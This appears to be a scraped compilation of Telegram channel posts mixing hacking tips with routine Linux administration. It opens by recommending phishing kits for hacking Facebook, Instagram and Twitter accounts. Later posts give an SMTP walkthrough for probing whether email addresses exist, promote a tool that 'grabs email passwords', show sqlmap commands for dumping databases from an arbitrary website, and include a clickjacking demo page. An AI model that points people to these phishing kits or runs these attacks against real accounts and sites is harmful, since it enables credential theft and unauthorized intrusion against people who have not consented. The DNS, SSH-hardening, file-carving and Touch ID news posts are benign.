▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑LOOKING FOR BEST PHISHING SCRIPTS FOR HACK FCB-INSTA-TWITTER ,,,2020

https://github.com/DarkSecDevelopers/HiddenEye

https://github.com/suljot/shellphish

https://github.com/htr-tech/nexphisher

https://github.com/MuhammadSheehab/FB-Phishing

https://github.com/topics/phishing?l=html

https://getgophish.com/

http://phishing-server.com/

https://github.com/sptorg/sptoolkit

https://github.com/pentestgeek/phishing-frenzy

https://github.com/securestate/king-phisher

E N J O Y ❤️👍🏻
USE FOR LEARN
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How Configure dns service ?

root@localhost /# yum -y install bind

root@localhost /# vim /etc/named.conf
listen-on port 53 { any; };
allow-query { any; };

root@localhost /#vim /etc/named.rfc1912.zones
zone "kgc.com" IN {
type master;
file "kgc.com.zone";
allow-update { none; };

root@localhost /# cd /var/named/

root@localhost named# cp -p named.localhost kgc.com.zone

root@localhost named# vim kgc.com.zone
$TTL 1D
@ IN SOA @ rname.invalid. (
0 ; serial
1D ; refresh
1H ; retry
1W ; expire
3H ) ; minimum
NS @
A 127.0.0.1
www IN A 192.168.75.134

root@localhost named#systemctl restart named


@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

24/24 posts enjoy & share us ❤️👍🏻

T.me/UndercodeTesting

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑some file carving terminologies to remember:

Block – The smallest size of data units that can be written to storage

Header – The starting point of the file.

Footer – The last bytes of the file.

Fragment – One or several blocks are belonging to a single file.

Base-fragment – First fragment of file container, the header of the file.

Fragmentation point – The last block just before fragmentation takes place. Multiple fragments in any file results in several fragmentation points.

#fastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to check email adress validity ?

Let's try to check if the someuser@gmail.com address exists or not. First, we need to find the MX records associated with the recipient's domain, in our case, gmail.com. We will be using a DNS lookup utility called dig, which is installed on most Linux systems . At the command prompt, enter the following command:

> dig gmail.com MX


2) The output should look like this:

; << >> DiG 9.8.2rc1-RedHat-9.8.2-0.47.rc1.el6 << >> gmail.com MX @ 8.8.8.8
;; global options: + cmd
;; Got answer:
;; ->> HEADER <<- opcode: QUERY, status: NOERROR, id: 32294
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0

🦑 QUESTION SECTION:
; gmail.com. IN MX

3) ;; ANSWER SECTION:
gmail.com. 3599 IN MX 10 alt1.gmail-smtp-in.l.google.com.
gmail.com. 3599 IN MX 20 alt2.gmail-smtp-in.l.google.com.
gmail.com. 3599 IN MX 30 alt3.gmail-smtp-in.l.google.com.
gmail.com. 3599 IN MX 40 alt4.gmail-smtp-in.l.google.com.
gmail.com. 3599 IN MX 5 gmail-smtp-in.l.google.com.

4) ;; Query time: 20 msec
;; SERVER: 8.8.8.8 # 53 (8.8.8.8)
;; WHEN: Fri Aug 26 10:13:19 2016
;; MSG SIZE rcvd: 150
;


5) We can notice that there are several MX records each with a different preference value, the lower the value, the higher the priority. The sending server will first try to deliver the email to the server with the highest priority, which in our case is 'gmail-smtp-in.l.google.com'

Next, we need to connect to the 'gmail-smtp-in.l.google.com' mail server on port 25 (SMTP) to confirm that the someuser@gmail.com email address is correct. For this we can use either Telnet or Netcat. Both tools are available from software for most Linux distributions.

$ nc gmail-smtp-in.l.google.com 25 # or telent gmail-smtp-in.l.google.com 25
220 mx.google.com ESMTP a12si21630825itb.5 - gsmtp


6) To start a conversation like HELO. Some servers also accept EHLO instead of HELO.

HELO mydomain.com
250 mx.google.com at your service


7) Type: mail from: <name@mydomain.com>

mail from: <name@mydomain.com>
250 2.1.0 OK v72si21823782itb.85 - gsmtp


If the server responds with “250”, it means we can move on. Next, enter: rcpt to: <someuser@gmail.com>

rcpt to: <someuser@gmail.com>
250 2.1.5 OK v72si21823782itb.85 - gsmtp


8) The server response will tell us if the email address “someuser@gmail.com” is valid or not.
If you get “250 OK” it means that the email address exists.

If you receive a “550” response as shown below, it means that the email account you were trying to reach does not exist.

rcpt to: <someuser2345@gmail.com>
550-5.1.1 The email account that you tried to reach does not exist. Please try
550-5.1.1 double-checking the recipient's email address for typos or
550-5.1.1 unnecessary spaces. Learn more at
550 5.1.1 https://support.google.com/mail/answer/6596 y18si12470464ioi.55 - gsmtp


That's all! We hope you found this as helpful as we did.

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Disable SSH Password Authentication in linux :

»Disabling password authentication adds an extra layer of security to your server.

Before disabling SSH password authentication, make sure you can log into your server without a password, and the user you log in with has sudo privileges .

1) Login to your remote server:

ssh sudouser @ serveripaddress


2) Open the SSH configuration file in a text editor :

sudo nano / etc / ssh / sshdconfig


3) Find the following directives and change them as follows:

/ etc / ssh / sshd_config
PasswordAuthentication no
ChallengeResponseAuthentication no
UsePAM no

4)After that save the file and restart the SSH service by typing:

sudo systemctl restart ssh


5) At this point, password-based authentication is disabled.

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

HA Rudra_ Vulnhub Walkthrough
FULL WITH PICTURES

Initial Compromise
LFI
Established Foothold
Netcat session
Internal Recon
Access Mysql database
Data Exfiltration
Steganography
Lateral Movement
Connect to ssh
Privilege Escalation
Sudo rights

E N J O Y❤️👍🏻

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Checking tool for Hash codes, Passwords, and Emails leaked, using leakz module from Aidan Holland, which uses API from Aurelius Wendelken.

🦑F E A T U R E S :

-Grabb email passwords NEW!
-Check passwords leaked.
-Check hash code leaked.
-Check email leaked!

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) sudo apt update && sudo apt install python3 python3-pip

2) git clone https://github.com/GitHackTools/Leaked

3) cd Leaked

4) bash install_update.sh

5) python3 leaked.py

🦑Install and Run on Windows

1) Download and run Python 3 setup file from Python.org. In Install Python 3 , enable Add Python 3.7 to PATH and For all users

2) Download and run Git setup file from Git-scm.com, choose Use Git from Windows Command Propmt.

3) After that, Run Command Propmt or PowerShell and enter these commands:

4) git clone https://github.com/GitHackTools/Leaked

5) cd Leaked

6) ./install_update.bat

7) python leaked.py

8) choose options via numbers

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Respecting Lebanon & Lebanese here...

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The clickjacking attack :

1) The “clickjacking” attack allows an evil page to click on a “victim site” on behalf of the visitor.

2) Many sites were hacked this way, including Twitter, Facebook, Paypal and other sites. They have all been fixed, of course.

The idea
The idea is very simple.

3) Here’s how clickjacking was done with Facebook:

E X A M P L E :

4) A visitor is lured to the evil page. It doesn’t matter how.
The page has a harmless-looking link on it (like “get rich now” or “click here, very funny”).

5) Over that link the evil page positions a transparent <iframe> with src from facebook.com, in such a way that the “Like” button is right above that link. Usually that’s done with z-index.

6) In attempting to click the link, the visitor in fact clicks the button.
The demo

7) Here’s how the evil page looks. To make things clear, the <iframe> is half-transparent (in real evil pages it’s fully transparent):

<style>
iframe { /* iframe from the victim site */
  width: 400px;
  height: 100px;
  position: absolute;
  top:0; left:-20px;
  opacity: 0.5; /* in real opacity:0 */
  z-index: 1;
}
</style>

<div>Click to get rich now:</div>

<!-- The url from the victim site -->
<iframe src="/clickjacking/facebook.html"></iframe>

<button>Click here!</button>

<div>...And you're cool (I'm a cool hacker actually)!</div>

E N J O Y ❤️👍🏻
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to set up a black and white list of web pages and prohibit computers from accessing certain websites

1) Control the USB port. It is forbidden to connect the computer to USB storage devices (U disk, mobile phone, tablet, mobile hard disk, SD card, USB optical drive, etc.), but does not control USB non-storage devices, such as mouse, keyboard, etc. You can also set a specific USB storage device, that is, the computer can only recognize the USB storage device, and you can also set this specific storage device to only copy files to the computer, but not from the computer to it. You can also set a password to copy files.

2) Control the transmission of files from the external network. It is forbidden to send files through the external network, including: setting a specific QQ account to log in or allowing QQ chat, prohibiting QQ uploading files, prohibiting QQ group uploading files, allowing WeChat chatting, prohibiting WeChat uploading files, prohibiting the use of network disks, prohibiting the use of cloud disks, and prohibiting Use mailboxes, prohibit the use of FTP, prohibit the use of any network application to transfer files, etc.

3) Control the transmission of files in the intranet. It is forbidden to use any intranet communication tools, such as Fei Ge, Fei Qiu, etc., and it can also prohibit LAN communication, network sharing, and network cable transmission of computer files.

4) Other methods. It is prohibited to use Bluetooth to send files, prohibit the use of infrared to send files, prohibit computers to install portable wifi to send files, prohibit computers to install wireless routers to send computer files, prohibit computers to install virtual machines to send files, prohibit remote desktops to send computer files, prohibit the use of clipboards, Screenshots etc. are prohibited.

E N J O Y ❤️👍🏻
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FastTips SqlMap for #termux :

1) apt-get update

2) apt-get upgrade

3) pkg install perl

4) pkg install python2

5) pkg install git

6) git clone https://github.com/sqlmapproject/sqlmap

7) cd sqlmap

8) python2 swlmap.py

9) python2 sqlmap.py -u #website_link --dbs

10) python2 sqlmap.py -u #website_link --dbs --columns

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Apple Touch ID vulnerability could allow attackers to hijack iCloud account
#NEWS


> Earlier this year, Apple fixes iOS and a macOS the security vulnerability , the vulnerability could allow an attacker to gain unauthorized access to a user's iCloud account.

> This Alkemade, a security expert at IT security company Computest, discovered the vulnerability in February. The vulnerability exists in the TouchID (or FaceID) biometric feature implemented by Apple, which authenticates users to log in to websites on Safari. These are the websites that use Apple ID to log in. After the vulnerability was reported to Apple through the disclosure program, the iPhone manufacturer resolved the vulnerability in a server-side update .

🦑Certification defects :
The core of the vulnerability is: when a user tries to log in to a website that requires Apple ID, it will be prompted to use Touch ID to authenticate the login. Doing so will skip the two-factor authentication step, because it already uses multiple factors for identification, such as equipment and biometric information. When logging in to an Apple domain (such as "icloud.com"), ID and password are usually used for comparison. The website embeds an iframe pointing to Apple’s login authentication server ("https://idmsa.apple.com"). Handle the authentication process.

#NEWS
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁